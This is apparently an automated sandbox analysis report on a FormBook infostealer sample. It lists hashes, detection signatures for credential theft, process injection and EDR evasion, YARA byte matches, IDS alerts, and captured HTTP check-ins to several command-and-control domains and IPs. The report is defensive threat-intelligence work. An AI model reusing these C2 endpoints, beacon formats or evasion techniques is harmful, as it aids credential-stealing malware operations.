Windows Analysis Report
wavjjT3sEq.exe

Overview

General Information

Sample name: wavjjT3sEq.exe
renamed because original name is a hash value
Original sample name: 18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62.exe
Analysis ID: 1554612
MD5: ea8d328ba326e4f6c37f0d853f981122
SHA1: 6fdba2e03847634b20f105d0a3ff29348701c8c8
SHA256: 18623fe8fe11f35ef12ba7fd911a10b4f3b082e0a816849a6891cf2c9ece9f62
Tags: exe, www-vasehu-xyz, user-JAMESWT_MHT

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wavjjT3sEq.exe (PID: 4200 cmdline: "C:\Users\user\Desktop\wavjjT3sEq.exe" MD5: EA8D328BA326E4F6C37F0D853F981122)
    • tIEQBQsFNUYr.exe (PID: 5300 cmdline: "C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • mshta.exe (PID: 6336 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • tIEQBQsFNUYr.exe (PID: 6320 cmdline: "C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 5924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c270:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x142bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
0.2.wavjjT3sEq.exe.120000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.wavjjT3sEq.exe.120000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e813:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16862:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched

          AV Detection

          Source: wavjjT3sEq.exe, Avira: detected
          Source: http://www.40wxd.top/xqel/?TTd=yRNPZBU8fZA&mnYxMt=vvqDHEJ83RQMdUhg1EKNs//bEg71XT6q1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Ki9HalpMd1Ir/+EzHBu1DH6h7lGA7WG3xqwFFB+pHyvvKg==, Avira URL Cloud: Label: malware
          Source: http://www.40wxd.top/xqel/, Avira URL Cloud: Label: malware
          Source: wavjjT3sEq.exe, ReversingLabs: Detection: 71%
          Source: Yara match, File source: 0.2.wavjjT3sEq.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000002.3899264398.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.3911530315.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.3908871484.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1605691248.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.3917330030.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.3911848031.0000000002BD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1606273875.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: wavjjT3sEq.exe, Joe Sandbox ML: detected
          Source: wavjjT3sEq.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: wavjjT3sEq.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: mshta.pdbGCTL source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tIEQBQsFNUYr.exe, 00000002.00000000.1520159882.000000000100E000.00000002.00000001.01000000.00000004.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3911627042.000000000100E000.00000002.00000001.01000000.00000004.sdmp
          Source: Binary string: wntdll.pdbUGP source: wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wavjjT3sEq.exe, wavjjT3sEq.exe, 00000000.00000002.1605784571.0000000001A8E000.00000040.00001000.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1505562906.000000000173B000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000003.1503410876.0000000001588000.00000004.00000020.00020000.00000000.sdmp, wavjjT3sEq.exe, 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000003.00000002.3911877579.00000000037B0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3911877579.000000000394E000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1608127270.000000000360A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1605751778.0000000003439000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshta.pdb source: wavjjT3sEq.exe, 00000000.00000003.1605358427.000000000149D000.00000004.00000020.00020000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000002.00000002.3908394501.000000000119E000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\mshta.exe, Code function: 3_2_02F4C6D0: FindFirstFileW, FindNextFileW, FindClose
          Source: C:\Windows\SysWOW64\mshta.exe, Code function: 3_2_02F39BB0: 4x nop then xor eax, eax
          Source: C:\Windows\SysWOW64\mshta.exe, Code function: 3_2_037004E8: 4x nop then mov ebx, 00000004h

          Networking

          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49720 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49713 -> 35.156.117.131:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49715 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49722 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49719 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49762 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49770 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49717 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49806 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49783 -> 206.119.82.134:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49831 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49815 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49822 -> 162.213.249.216:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49850 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49860 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49872 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49885 -> 217.160.0.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49935 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49961 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49921 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49948 -> 54.179.173.60:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50008 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49989 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50010 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50011 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53752 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53766 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53751 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50015 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53756 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53754 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53764 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53767 -> 35.156.117.131:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53760 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53758 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50012 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53763 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:53762 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49999 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53755 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53753 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53761 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53759 -> 172.81.61.224:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50009 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53757 -> 142.250.185.179:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50013 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:53765 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50014 -> 52.20.84.62:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50007 -> 3.33.130.190:80
          Source: DNS query: www.vasehub.xyz
          Source: DNS query: www.moritynomxd.xyz
          Source: Joe Sandbox View, IP Address: 52.20.84.62
          Source: Joe Sandbox View, IP Address: 35.156.117.131
          Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
          Source: Joe Sandbox View, ASN Name: AMAZON-AESUS
          Source: Joe Sandbox View, ASN Name: AMAZON-02US
          Source: Joe Sandbox View, ASN Name: AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49706
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.8:49718
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /h8b0/?mnYxMt=DRMewQ2K/nAxApdBv9ra6bsCdKq6L6XhjAtlDuz9ScYe9TdKczyHToKl/nXwUp75CTxdtMRmJbFDzl6M6vndpgUg2JSERF0UkR4bqmVQDFHy6vjAN9/CTn0QkHjb1AS2LQ==&TTd=yRNPZBU8fZA HTTP/1.1Host: www.tukaari.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: GET /s7e8/?TTd=yRNPZBU8fZA&mnYxMt=Qf5nKOHOS6pOo2hrLtSm+ampCv+PHNIpbdUHnCIedAl2mvk/ZCfVPn7bYBvLSFyKndMpVE3F/mLSkI4cHOWneDowc/gh6rYJzY7Er9+/8bJZT8eqOHKV6gTsddlCzKVbHQ== HTTP/1.1Host: www.specialgift.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: unknownHTTP traffic detected: POST /lclg/ HTTP/1.1Host: www.filelabel.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.filelabel.infoReferer: http://www.filelabel.info/lclg/Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 207User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 12 Nov 2024 17:33:43 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: 618a2981cf5a603a1e340252859201b1X-Runtime: 0.014474
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:37 GMTContent-Type: text/htmlContent-Length: 548Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:39 GMTContent-Type: text/htmlContent-Length: 548Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:39 GMTContent-Type: text/htmlContent-Length: 548Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:42 GMTContent-Type: text/htmlContent-Length: 548Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 17:34:44 GMTContent-Type: text/htmlContent-Length: 548Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:34:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:34:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:34:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 17:34:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 12 Nov 2024 17:35:04 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzip
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 12 Nov 2024 17:35:07 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzip
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 12 Nov 2024 17:35:10 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 1271 | Connection: close | Date: Tue, 12 Nov 2024 17:35:12 GMT | Server: Apache | X-Frame-Options: deny
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 12 Nov 2024 17:35:55 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 12 Nov 2024 17:35:58 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 12 Nov 2024 17:36:00 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 12 Nov 2024 17:36:03 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Tue, 12 Nov 2024 17:36:09 GMT | Content-Type: text/html | Content-Length: 52139 | Connection: close | ETag: "672f791b-cbab"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Tue, 12 Nov 2024 17:36:12 GMT | Content-Type: text/html | Content-Length: 52139 | Connection: close | ETag: "672f77fd-cbab"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Tue, 12 Nov 2024 17:36:14 GMT | Content-Type: text/html | Content-Length: 52139 | Connection: close | ETag: "672f77fe-cbab"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Tue, 12 Nov 2024 17:36:17 GMT | Content-Type: text/html | Content-Length: 52139 | Connection: close | ETag: "672f77ff-cbab"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 12 Nov 2024 17:37:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: 2978624a8f32ae2f31fda779228655a8X-Runtime: 0.027656
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3917330030.00000000052F0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3917330030.00000000052F0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop/h8b0/
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: mshta.exe, 00000003.00000002.3916202013.00000000041C4000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1912289226.0000000005864000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko20yw.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko40yyygA.woff2)
